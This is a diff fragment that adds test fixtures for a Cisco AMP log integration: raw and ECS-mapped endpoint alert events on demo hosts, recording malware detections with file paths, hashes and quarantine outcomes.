"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "md5": "e9d8c15e7d18678dd41771f72ed6693c" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Dyre" + ], + "hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Dyre", + "hostname": "Demo_Dyre" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581799549Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258014979293000,\"timestamp\":1610705609,\"timestamp_nanoseconds\":581000000,\"date\":\"2021-01-15T10:13:29+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258014979293255\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6176258014979293000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "GenericKD:Dyreza-tpd", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "23:d5:92:eb:f8:9b", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "23:d5:92:eb:f8:9b" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6176258014979293255", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:13:17.000Z", + "file": { + "name": "webinstall.exe", + "path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "hash": { + "sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "sha256": 
"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "md5": "e9d8c15e7d18678dd41771f72ed6693c" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Dyre" + ], + "hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Dyre", + "hostname": "Demo_Dyre" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581801458Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176257963439686000,\"timestamp\":1610705597,\"timestamp_nanoseconds\":569000000,\"date\":\"2021-01-15T10:13:17+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176257963439685702\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6176257963439686000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "GenericKD:Dyreza-tpd", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "23:d5:92:eb:f8:9b", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "23:d5:92:eb:f8:9b" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6176257963439685702", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:12:53.000Z", + "file": { + "name": "ekjrngjker.exe", + "path": "\\\\?\\C:\\ekjrngjker.exe", + "hash": { + "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "sha256": 
"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "md5": "b99e0a8c56f963246b6464b9fffbf7a2" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_AMP_Threat_Audit" + ], + "hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Threat_Audit", + "hostname": "Demo_AMP_Threat_Audit", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581803331Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":778000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667579691532307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6533667579691532000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "63:5f:47:2b:89:91", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "63:5f:47:2b:89:91" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6533667579691532307", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:12:53.000Z", + "file": { + "name": "ekjrngjker.exe", + "path": "C:\\ekjrngjker.exe", + "hash": { + "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "sha256": 
"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "md5": "b99e0a8c56f963246b6464b9fffbf7a2" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_AMP_Threat_Audit" + ], + "hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Threat_Audit", + "user": { + "name": "user@testdomain.com" + }, + "hostname": "Demo_AMP_Threat_Audit" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581805234Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":747000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667579691532306\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6533667579691532000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.DFC.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "63:5f:47:2b:89:91", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "63:5f:47:2b:89:91" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6533667579691532306", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:12:53.000Z", + "file": { + "name": "ekjrngjker.exe", + "path": "\\\\?\\C:\\ekjrngjker.exe", + "hash": { + "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "sha256": 
"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "md5": "b99e0a8c56f963246b6464b9fffbf7a2" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_AMP_Threat_Audit" + ], + "hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Threat_Audit", + "hostname": "Demo_AMP_Threat_Audit", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581807110Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":371000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667579691532305\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6533667579691532000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.DFC.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "63:5f:47:2b:89:91", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "63:5f:47:2b:89:91" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6533667579691532305", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:12:52.000Z", + "file": { + "name": "ekjrngjker.exe", + "path": "C:\\ekjrngjker.exe", + "hash": { + "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "sha256": 
"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "md5": "b99e0a8c56f963246b6464b9fffbf7a2" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_AMP_Threat_Audit" + ], + "hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Threat_Audit", + "user": { + "name": "user@testdomain.com" + }, + "hostname": "Demo_AMP_Threat_Audit" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581809002Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667575396565000,\"timestamp\":1610705572,\"timestamp_nanoseconds\":971000000,\"date\":\"2021-01-15T10:12:52+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667575396565008\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6533667575396565000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.DFC.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "63:5f:47:2b:89:91", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "63:5f:47:2b:89:91" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6533667575396565008", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + } + ] +} \ No newline at end of file diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp4.ndjson.log b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp4.ndjson.log new file mode 100644 index 00000000000..f31bf18a23a 
--- /dev/null +++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp4.ndjson.log 
@@ -0,0 +1,100 @@ +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6508397899087348000,"timestamp":1610659036,"timestamp_nanoseconds":295927133,"date":"2021-01-14T21:17:16+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.6A37D750F0-100.SBX.TG","detection_id":"6508397899087347713","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14930696955218,"timestamp":1610656706,"timestamp_nanoseconds":844899579,"date":"2021-01-14T20:38:26+00:00","event_type":"Executed 
malware","event_type_id":1107296272,"detection":"W32.E4FCCBFA69-95.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610656706,"start_date":"2021-01-14T20:38:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":7120,"disposition":"Malicious","file_name":"QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":572000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":4788,"disposition":"Malicious","file_name":"28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}} 